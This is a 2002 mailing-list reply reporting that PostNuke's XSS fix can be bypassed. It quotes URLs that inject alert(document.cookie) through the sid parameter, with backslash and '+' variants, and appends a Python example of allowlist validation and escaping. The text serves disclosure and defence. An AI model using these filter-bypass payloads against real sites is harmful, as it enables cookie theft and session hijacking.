Re: Postnuke XSS fixed

From: Daniel Woods (dwoodsat_private)
Date: Wed Oct 02 2002 - 09:09:33 PDT


    Humm!
    
    > on 26th Sep the following url:
    > http://news.postnuke.com/modules.php
    >		?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
    >
    > used to give Alert PopUp and
    > Error:
    > DB Error: getArticles: 1064: You have an error in your SQL syntax near '='
    > at line 23
    >
    > now it gives:
    > Sorry - $HTTP_GET_VARS contains javascript...
    >
    > Prompt fix by PostNuke team, great work Keep it up! :)
    
    Not so fast on the praise :(
    
    It only took me a couple of workarounds to find ways to bypass the check.
    
      http://news.postnuke.com/modules.php
    	  ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
    
    Using the request...
    	  ?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
    gives me the DB Error: message
    
    And using the request...
    	  ?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
    gives me the Alert Popup and DB Error: message...  the '+' is treated as a blank.
    
    Thanks... Dan.
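
Added example (not part of the original message, and not PostNuke code): a Python model of why a check for the literal `<script>` string misses the two variants reported above, set beside allowlist validation of `sid` as an integer with escaping on output. The `blocklist_rejects` function is an assumed stand-in, since the page does not show the real check; the `sid=42` request is constructed.

```python
import html
import re
from urllib.parse import unquote_plus

# The sid values from the message, as sent on the wire; "benign" is constructed.
PREFIX = "op=modload&name=News&file=article&sid="
REQUESTS = {
    "original": PREFIX + "<script>alert(document.cookie);</script>",
    "backslash": PREFIX + "<\\script>alert(document.cookie);</script>",
    "plus": PREFIX + "<script+>alert(document.cookie);</script>",
    "benign": PREFIX + "42",
}

SID_RE = re.compile(r"[0-9]{1,10}")  # ASCII digits only, bounded length


def get_param(query, name):
    """Decode one query parameter the way a web stack does ('+' becomes a blank)."""
    for pair in query.split("&"):
        key, _, raw = pair.partition("=")
        if key == name:
            return unquote_plus(raw)
    return None


def blocklist_rejects(value):
    """ASSUMED stand-in for the deployed check: reject the literal tag only."""
    return "<script>" in value.lower()


def parse_sid(value):
    """Allowlist: return the article id as an int, or None for anything else."""
    return int(value) if value is not None and SID_RE.fullmatch(value) else None


def render_rejection(value):
    """Escape on output so a rejected value is displayed as text, never as markup."""
    return "Invalid article id: " + html.escape(value, quote=True)


def evaluate(query):
    sid = get_param(query, "sid")
    return {"decoded": sid, "blocklist_rejects": blocklist_rejects(sid),
            "sid": parse_sid(sid), "error_page": render_rejection(sid)}


if __name__ == "__main__":
    for label, query in REQUESTS.items():
        r = evaluate(query)
        print(f"{label:9} blocklist_rejects={r['blocklist_rejects']!s:5} sid={r['sid']}")
```

Because `parse_sid` hands the application an `int` or nothing, the same check also keeps the raw string out of the `getArticles` query that produced the DB error.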
    


